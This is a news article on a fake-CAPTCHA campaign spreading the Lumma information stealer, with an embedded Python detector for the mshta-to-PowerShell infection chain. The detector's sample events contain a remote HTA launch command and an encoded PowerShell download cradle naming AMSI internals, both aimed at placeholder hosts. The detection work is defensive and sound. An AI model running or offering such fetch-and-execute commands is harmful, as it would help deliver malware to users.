
Beware of Fake CAPTCHA: New Lumma Stealer Campaign Targets Multiple Industries

By John Jordan

Cybersecurity experts are raising alarms over a new malware campaign that exploits fake CAPTCHA verification checks to distribute the notorious Lumma information stealer. This global campaign has been identified by Netskope Threat Labs, which reports that victims are being targeted across various countries, including Argentina, Colombia, the United States, and the Philippines.


Key Takeaways

  • Global Reach: Victims are located in multiple countries, with a focus on various industries.

  • Attack Methodology: The campaign uses fake CAPTCHA pages to trick users into executing malicious commands.

  • Evasion Techniques: The infection chain runs outside the browser and attempts to bypass the Windows Antimalware Scan Interface (AMSI) to evade detection.

The attack begins when a user visits a compromised website, which redirects them to a fraudulent CAPTCHA page. There, the victim is instructed to copy a command and paste it into the Windows Run prompt. The command uses the native mshta.exe binary to download and execute an HTA (HTML Application) file from a remote server.

This method is reminiscent of the earlier ClickFix technique, in which the victim was tricked into running a Base64-encoded PowerShell script that started the Lumma Stealer infection.

Once the HTA file is executed, it runs a PowerShell command that launches a subsequent payload. This payload unpacks another PowerShell script responsible for decoding and loading the Lumma payload, all while attempting to bypass the Windows Antimalware Scan Interface (AMSI) to evade detection.
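The chain above (Run prompt, then mshta.exe fetching a remote HTA, then an encoded PowerShell command that references AMSI) leaves a recognizable parent/child pattern in process-creation telemetry. The following detector is an added example written for this article; it is not code from Netskope Threat Labs, BetterWorld Technology, or The Hacker News. It assumes Sysmon Event ID 1 style records flattened into dicts with `pid`, `ppid`, `image`, `parent_image` and `command_line` fields; the sample events, the `example.invalid` URLs and the encoded stage-2 script are all constructed for illustration and are not indicators from the real campaign.

```python
"""Flag the fake-CAPTCHA / ClickFix execution chain in process-creation events.

Added example (not Netskope's or BetterWorld's code). Assumes Sysmon-style
Event ID 1 records flattened into dicts. All sample data below is constructed.
"""
import base64
import re

LOLBIN_NAMES = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
                "curl.exe", "certutil.exe"}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
AMSI_RE = re.compile(r"amsi(utils|initfailed|scanbuffer)", re.I)
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I)
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_powershell(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stage-2 command: a download cradle that merely names an AMSI class.
# It is NOT a working bypass; it only carries the strings a detector looks for.
SAMPLE_STAGE2 = ("$t='System.Management.Automation.AmsiUtils'; "
                 "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2.ps1')")

# Constructed process-creation events (hypothetical PIDs, paths and URLs).
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 2200, "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\winlogon.exe", "command_line": "explorer.exe"},
    # Run-prompt paste: explorer.exe launches mshta.exe with a remote HTA URL.
    {"pid": 5532, "ppid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "mshta https://example.invalid/verify.hta"},
    # The HTA spawns PowerShell with an encoded command.
    {"pid": 5610, "ppid": 5532,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "command_line": "powershell.exe -w hidden -ep bypass -enc " + encode_powershell(SAMPLE_STAGE2)},
    # Benign control: a normal child of explorer.exe.
    {"pid": 6000, "ppid": 4120, "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "notepad.exe"},
]


def image_name(path: str) -> str:
    """Return the lower-cased file name from a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Decode a -EncodedCommand argument, or return None if absent/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def ancestry(event: dict, by_pid: dict, max_depth: int = 8) -> str:
    """Render the parent chain as 'root > ... > leaf' using ppid links."""
    chain = [image_name(event["image"])]
    cur = event
    for _ in range(max_depth):
        cur = by_pid.get(cur["ppid"])
        if cur is None:
            break
        chain.append(image_name(cur["image"]))
    return " > ".join(reversed(chain))


def analyze(events: list) -> list:
    """Return one finding per event that matches a stage of the chain."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name, parent, cmd = image_name(e["image"]), image_name(e["parent_image"]), e["command_line"]
        reasons = []
        # Stage 1: the Run prompt runs under explorer.exe, so a LOLBin child of
        # explorer.exe carrying a remote URL is the paste-and-run moment.
        if parent == "explorer.exe" and name in LOLBIN_NAMES and URL_RE.search(cmd):
            reasons.append(f"explorer.exe launched {name} with a remote URL (Run prompt paste)")
        # Stage 2: the HTA hands off to PowerShell.
        if parent == "mshta.exe" and name in ("powershell.exe", "pwsh.exe"):
            reasons.append("mshta.exe spawned PowerShell")
        # Stage 3: inspect the encoded command for AMSI tampering and download cradles.
        decoded = decode_encoded_command(cmd)
        if decoded:
            if AMSI_RE.search(decoded):
                reasons.append("encoded command references AMSI internals")
            if DOWNLOAD_RE.search(decoded):
                reasons.append("encoded command contains a download cradle")
        if reasons:
            findings.append({"pid": e["pid"], "image": name, "chain": ancestry(e, by_pid),
                             "reasons": reasons, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["pid"], f["chain"], "|", "; ".join(f["reasons"]))
```

Two stages firing on the same chain is the signal worth alerting on; a lone `explorer.exe > powershell.exe` with a URL is common in admin activity, while `explorer.exe > mshta.exe > powershell.exe` with an encoded command that names AMSI classes almost never is. Decoding the `-EncodedCommand` argument before matching matters because the Base64 hides every string signature from a plain command-line rule.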

According to Leandro Fróes, a senior threat research engineer at Netskope Threat Labs, "By downloading and executing malware in such ways, the attacker avoids browser-based defenses since the victim will perform all of the necessary steps outside of the browser context."

The Lumma Stealer operates on a malware-as-a-service (MaaS) model and has shown significant activity in recent months. Its varied delivery methods and payloads complicate detection and blocking efforts, particularly when user interactions are exploited.

Related Developments

In a related development, Lumma has been distributed through approximately 1,000 counterfeit domains that impersonate popular platforms like Reddit and WeTransfer. These domains redirect users to download password-protected archives containing an AutoIT dropper known as SelfAU3 Dropper, which subsequently executes the Lumma stealer.

Earlier this year, threat actors employed a similar strategy, creating over 1,300 domains masquerading as AnyDesk to distribute the Vidar Stealer malware.

The rise of this campaign coincides with the emergence of an updated Phishing-as-a-Service (PhaaS) toolkit called Tycoon 2FA. This toolkit includes advanced features designed to obstruct security tools from confirming its malicious intent and inspecting its web pages. Notably, it uses legitimate, possibly compromised, email accounts to send phishing emails and implements various measures to evade analysis by detecting automated security scripts.

Additionally, social engineering attacks have been observed that leverage Gravatar to create convincing fake profiles mimicking legitimate services. This tactic tricks users into revealing their credentials by exploiting Gravatar's 'Profiles as a Service.'

Stephen Kowski, Field CTO at SlashNext, noted, "Instead of generic phishing attempts, attackers tailor their fake profiles to closely resemble the legitimate services they're mimicking through less known or protected services."

Cybersecurity has never been more critical. At BetterWorld Technology, we empower businesses with advanced solutions to combat emerging threats while driving innovation. Protect your organization with confidence—contact us today to schedule a consultation and secure your company’s future.

Sources

  • Beware: Fake CAPTCHA Campaign Spreads Lumma Stealer in Multi-Industry Attacks, The Hacker News.
